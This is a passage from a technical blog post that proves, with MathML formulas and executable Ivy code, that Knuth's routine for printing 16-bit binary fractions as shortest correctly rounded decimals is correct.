as opposed to IEEE 754 “round half to even”,
and the rounding equations reflect this.
The answer does not change significantly if we use IEEE rounding instead.)
<a class=anchor href="#notation"><h2 id="notation">Notation</h2></a>
<p>
Next, let’s define some convenient notation.
As usual we will write the fractional part of <math><mi>x</mi></math>
as <math><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow></math>
and rounding as <math><mrow><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow></mrow></math>.
We will also define <math><msub><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></math>, and <math><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></math>
to be the fractional part, floor, ceiling, and rounding
of <math><mi>x</mi></math> relative to decimal fractions with <math><mi>p</mi></math> digits:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>{</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>}</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌈</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌉</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>[</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>]</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr></mtable></math></div>
<p>
Using the new notation, the correctly rounded <math><mi>p</mi></math>-digit decimal for <math><mi>f</mi></math> is <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>.
<p>
Following Knuth’s paper, this post also uses the notation
<math><mrow><mo stretchy=false>[</mo><mi>x</mi><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>y</mi><mo stretchy=false>]</mo></mrow></math> for the interval from <math><mi>x</mi></math> to <math><mi>y</mi></math>, including <math><mi>x</mi></math> and <math><mi>y</mi></math>;
<math><mrow><mo stretchy=false>[</mo><mi>x</mi><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>y</mi><mo stretchy=false>)</mo></mrow></math> is the half-open interval, which excludes <math><mi>y</mi></math>.
<a class=anchor href="#initial_solution"><h2 id="initial_solution">Initial Solution</h2></a>
<p>
The definitions of ‘accurate’ and ‘correctly rounded’ imply two simple observations,
which we will prove as lemmas.
(In my attempt to avoid accusations of imprecision,
I may well be too pedantic.
Skip the proof of any lemma you think is obviously true.)
<div class=lemma id=accuracy>
<p>
<b><i>Accuracy Lemma</i></b>. The accurate decimals are those in the <i>accuracy interval</i> <math><mrow><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. This follows immediately from the definition of accurate.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mrow><mo>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mi>f</mi></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>accurate]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[multiply</mtext><mspace width='0.3em' /><mtext>by</mtext><mspace width='0.3em' /></mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[domain</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor;</mtext><mspace width='0.3em' /></mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>½</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>½</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[subtract</mtext><mspace width='0.3em' /><mtext>½]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>d</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[divide</mtext><mspace width='0.3em' /><mtext>by</mtext><mspace width='0.3em' /></mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
We have shown that <math><mi>d</mi></math> being accurate is equivalent to <math><mrow><mi>d</mi><mo>∈</mo><mi>f</mi><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></math>.
</div>
<div class=lemma id=5digit>
<p>
<b><i>Five-Digit Lemma</i></b>. The correctly rounded 5-digit decimal <math><mrow><mi>d</mi><mo>=</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mn>5</mn></msub></mrow></math>
sits inside the accuracy interval.
<p>
<i>Proof</i>.
Intuitively, the accuracy interval has width <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup></mrow></math> while 5-digit decimals occur at
the narrower spacing <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup></mrow></math>, so at least one such decimal appears inside each accuracy interval.
<p>
More precisely,<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>d</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>d</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>+</mo><mn>½</mn><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[range</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>−</mo><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><mo>+</mo><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mo stretchy=false>]</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>]</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
We have shown that the 5-digit correctly-rounded decimal for <math><mi>f</mi></math> is in the accuracy interval.
</div>
<p>
The problem statement and these two lemmas
lead to a trivial direct solution:
compute correctly rounded <math><mi>p</mi></math>-digit decimals
for increasing <math><mi>p</mi></math> and return the first accurate one.
<p>
We will implement that solution in
<a href="https://robpike.io/ivy">Ivy, an APL-like calculator language</a>.
Ivy has arbitrary-precision rationals and lightweight syntax,
making it a convenient tool for sketching and testing mathematical algorithms,
in the spirit of Iverson’s Turing Award lecture about APL,
“<a href="https://dl.acm.org/doi/pdf/10.1145/1283920.1283935">Notation as a Tool of Thought</a>.”
Like APL, Ivy uses strict right-to-left operator precedence:
<code>1+2*3+4</code> means <code>(1+(2*(3+4)))</code>,
and <code>floor 10 log f</code> means <code>floor (10 log f)</code>.
Operators can be prefix unary like <code>floor</code> or infix binary like <code>log</code>.
Each of the Ivy displays in this post is executable:
you can edit the code and re-run them by clicking the Play button (“▶️”).
A full introduction to Ivy is beyond the scope of this post;
see <a href="https://swtch.com/ivy/demo.html">the Ivy demo</a> for more examples.
<p>
To start, we need to build a small amount of Ivy scaffolding.
The binary operator <code>p digits d</code> splits an integer <code>d</code> into <code>p</code> digits:
<pre class='language-ivy'>op p digits d = (p rho 10) encode d
</pre>
<pre class='language-ivy'>3 digits 123
-- out --
1 2 3
</pre>
<pre class='language-ivy'>4 digits 123
-- out --
0 1 2 3
</pre>
<p>
Next, Ivy already provides <math><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow></math> and <math><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow></math>,
but we need to define operators for <math><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow></math>, <math><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></math>, and <math><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></math>.
<pre class='language-ivy'>op round x = floor x + 1/2
op p round x = (round x * 10**p) / 10**p
op p floor x = (floor x * 10**p) / 10**p
op p ceil x = (ceil x * 10**p) / 10**p
</pre>
<p>
(Like APL, Ivy uses strict right-to-left evaluation;
<code>1/2</code> is a rational constant literal, not a division.)
<p>
Now we can write our trivial solution.
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while 1
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
</pre>
<a class=anchor href="#initial_proof_of_correctness"><h2 id="initial_proof_of_correctness">Initial Proof of Correctness</h2></a>
<p>
The correctness of <code>bin2dec</code> is simple to prove:
<ul>
<li>
The implementation of <code>round</code> is the mathematical definition of <math><mi>p</mi></math>-digit rounding,
so the result is correctly rounded.
<li>
By the <a href="#accuracy">Accuracy Lemma</a>, <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> are correctly defined
for use in the accuracy test <math><mrow><MI>𝑚𝑖𝑛</MI><mo>≤</mo><mi>d</mi><mo><</mo><MI>𝑚𝑎𝑥</MI><mo>,</mo></mrow></math>
so the result is accurate.
<li>
The loop considers correctly rounded forms
of increasing length until finding one that is accurate,
so the result must be shortest.
<li>
By the <a href="#5digit">Five-Digit Lemma</a>, the loop returns after at most 5 iterations, proving termination.</ul>
<p>
Therefore <code>bin2dec</code> returns the shortest accurate correctly rounded decimal for <math><mi>f</mi></math>.
<a class=anchor href="#testing"><h2 id="testing">Testing</h2></a>
<p>
Knuth’s motivating example was that the decimal 0.4 converted to binary and back
printed as 0.39999 in TeX.
Let’s define a decimal-to-binary converter and check how it handles 0.4.
<pre class='language-ivy'>op dec2bin f = (round f * 2**16) / 2**16
</pre>
<pre class='language-ivy'>dec2bin 0.4
-- out --
13107/32768
</pre>
<pre class='language-ivy'>dec2bin 0.39999
-- out --
13107/32768
</pre>
<pre class='language-ivy'>float dec2bin 0.4
-- out --
0.399993896484
</pre>
<p>
We can see that both <math><mn>0.4</mn></math> and <math><mn>0.39999</mn></math> read as <math><mrow><mn>26214/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>, or <math><mrow><mn>13107/2</mn><msup><mspace height='0.66em' /><mn>15</mn></msup></mrow></math> in reduced form.
The <code>float</code> operator converts that fraction to an Ivy floating-point value, which Ivy then prints
to a limited number of decimals.
We can see that 0.39999 is the correctly rounded 5-digit form.
<p>
Now let’s see how our printer does:
<pre class='language-ivy'>bin2dec dec2bin 0.4
-- out --
4
</pre>
<p>
It works! And it works for longer fractions as well:
<pre class='language-ivy'>bin2dec dec2bin 0.123
-- out --
1 2 3
</pre>
<p>
(The values being printed are vectors of digits of the decimal fraction.)
<p>
We can also implement Knuth’s solution, to compare against <code>bin2dec</code>.
<pre class='language-ivy'>op knuthP2 f =
n = f * 2**16
s = (10 * n) + 5
t = 10
d = ()
:while 1
:if t > 65536
s = s + 32768 - t/2
:end
d = d, floor s/65536
s = 10 * (s mod 65536)
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<p>
Compared to Knuth’s original program text,
the variable <code>d</code> is now an Ivy vector instead of a fixed-size array,
and the variable <code>j</code>, previously the number of entries used in the array,
remains only implicitly as the length of the vector.
The assignment ‘<i>j</i> := 0’ is now ‘<code>d = ()</code>’, initializing <math><mi>d</mi></math> to the empty vector.
And ‘<i>j</i> := <i>j</i> + 1; <i>d</i>[<i>j</i>] = <i>s</i> <b>div</b> 65536’
is now ‘<code>d = d, floor s/65536</code>’, appending <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>s</mi><mn>/65536</mn></mrow><mo stretchy=false>⌋</mo></mrow></math> to <math><mi>d</mi></math>.
<pre class='language-ivy'>knuthP2 dec2bin 0.4
-- out --
4
</pre>
<p>
Now we can use testing to prove the absence of bugs.
We’ll be doing this repeatedly, so we will define <code>check desc</code>,
which prints the result of the test next to a description.
<pre class='language-ivy'>)origin 0
op check desc =
all = (iota 2**16) / 2**16
ok = (bin2dec@ all) === (knuthP2@ all)
print '❌✅'[ok] desc
check 'initial bin2dec'
-- out --
✅ initial bin2dec
</pre>
<p>
In this code, ‘<code>)origin 0</code>’ configures Ivy to make <code>iota</code> and array indices start at 0
instead of APL’s usual 1;
<code>all</code> is <math><mrow><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mn>1</mn></msup><mn>6</mn><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mn>1</mn></msup><mn>6</mn></mrow></math>, all the 16-bit fractions;
<code>ok</code> is a boolean indicating whether <code>bin2dec</code> and <code>knuthP2</code> return
identical results on all inputs;
and the final line prints an emoji result and the description.
<p>
Of course, we want to do more than exhaustively check <code>knuthP2</code> against
our provably correct <code>bin2dec</code>.
We want to prove directly that the <code>knuthP2</code> code is correct.
We will do that by incrementally transforming <code>bin2dec</code> into <code>knuthP2</code>.
<a class=anchor href="#walking_digits"><h2 id="walking_digits">Walking Digits</h2></a>
<p>
We can start by simplifying the computation of decimals that are
shorter than necessary.
To build an inuition for that, it will help to look at
the accuracy intervals of short decimals.
Here are the intervals for our test case:
<pre class='language-ivy'>op show x = (mix 'min ' 'f' 'max'), mix '%.100g' text@ (dec2bin x) + (-1 0 1) * 2**-17
show 0.4
-- out --
min 0.39998626708984375
f 0.399993896484375
max 0.40000152587890625
</pre>
<p>
That printed the exact decimal values of
<math><mrow><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> (<math><MI>𝑚𝑖𝑛</MI></math>), <math><mi>f</mi></math>, and <math><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> (<math><MI>𝑚𝑎𝑥</MI></math>)
for <math><mrow><mi>f</mi><mo>=</mo><mtext>dec2bin</mtext><mo stretchy=false>(</mo><mn>0.4</mn><mo stretchy=false>)</mo><mo>=</mo><mrow><mo>[</mo><mrow><mn>0.4</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow><mo>]</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>=</mo><mn>26214/65536</mn></mrow></math>.
<p>
Here are a few cases that are longer but still short:
<pre class='language-ivy'>show 0.43
-- out --
min 0.42998504638671875
f 0.42999267578125
max 0.43000030517578125
</pre>
<pre class='language-ivy'>show 0.432
-- out --
min 0.43199920654296875
f 0.4320068359375
max 0.43201446533203125
</pre>
<pre class='language-ivy'>show 0.4321
-- out --
min 0.43209075927734375
f 0.432098388671875
max 0.43210601806640625
</pre>
<p>
These displays suggest a new strategy for <code>bin2dec</code>:
walk along the digits of these exact decimals until
<math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> diverge at the <math><mi>p</mi></math>th decimal place.
At that point, we have found a <math><mi>p</mi></math>-digit decimal between <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math>,
namely <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math>.
That result is obviously accurate and shortest.
It is not obvious that the result is correctly rounded,
but that turns out to be the case for <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>.
Intuitively, when <math><mi>p</mi></math> is shorter than necessary,
there are fewer <math><mi>p</mi></math>-digit decimals than 16-bit binary fractions,
so each accuracy interval can contain at most one decimal.
When the accuracy interval does contain a decimal,
that decimal must be both <math><msub><mrow><mo stretchy=false>[</mo><mi>f</mi><mo stretchy=false>]</mo></mrow><mi>p</mi></msub></math> and <math><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub></math>.
For the full-length case <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, the accuracy interval can contain
multiple <math><mi>p</mi></math>-digit decimals,
so <math><msub><mrow><mo stretchy=false>[</mo><mi>f</mi><mo stretchy=false>]</mo></mrow><mi>p</mi></msub></math> and <math><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub></math> may differ.
<p>
We will prove that now.
<div class=lemma id=rounding>
<p>
<b><i>Rounding Lemma</i></b>. For <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>, the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
If it does contain one,
that decimal is <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>,
the correctly rounded <math><mi>p</mi></math>-digit decimal for <math><mi>f</mi></math>.
<p>
<i>Proof</i>. By the definition of rounding, we know that <math><mrow><mi>d</mi><mo>=</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></mrow></math> is <i>at most</i> <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math> away from <math><mi>f</mi></math>
and that any other <math><mi>p</mi></math>-digit decimal must be <i>at least</i> <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> away from <math><mi>f</mi></math>.
Since <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>, those other decimals cannot be in the accuracy interval:
the rounded <math><mi>d</mi></math> is the only possible option.
(The rounded <math><mi>d</mi></math> may or may not itself be in the accuracy interval,
but it’s our best and only hope. If it isn’t there, no <math><mi>p</mi></math>-digit decimal is.)
</div>
<div class=lemma id=endpoint>
<p>
<b><i>Endpoint Lemma</i></b>. The endpoints <math><mrow><mi>f</mi><mo>±</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> of the accuracy interval
are never <math><mi>p</mi></math>-digit decimals for <math><mrow><mi>p</mi><mo>≤</mo><mn>5</mn></mrow></math>,
nor are they shortest accurate correctly rounded decimals.
<p>
<i>Proof</i>.
Because <math><mrow><mi>f</mi><mo>=</mo><mi>n</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup></mrow></math> for some integer <math><mi>n</mi></math>, <math><mrow><mi>f</mi><mo>±</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>=</mo><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
If an endpoint were a decimal of 5 digits or fewer,
it would be an integer multiple of <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>5</mn></mrow></msup></mrow></math>,
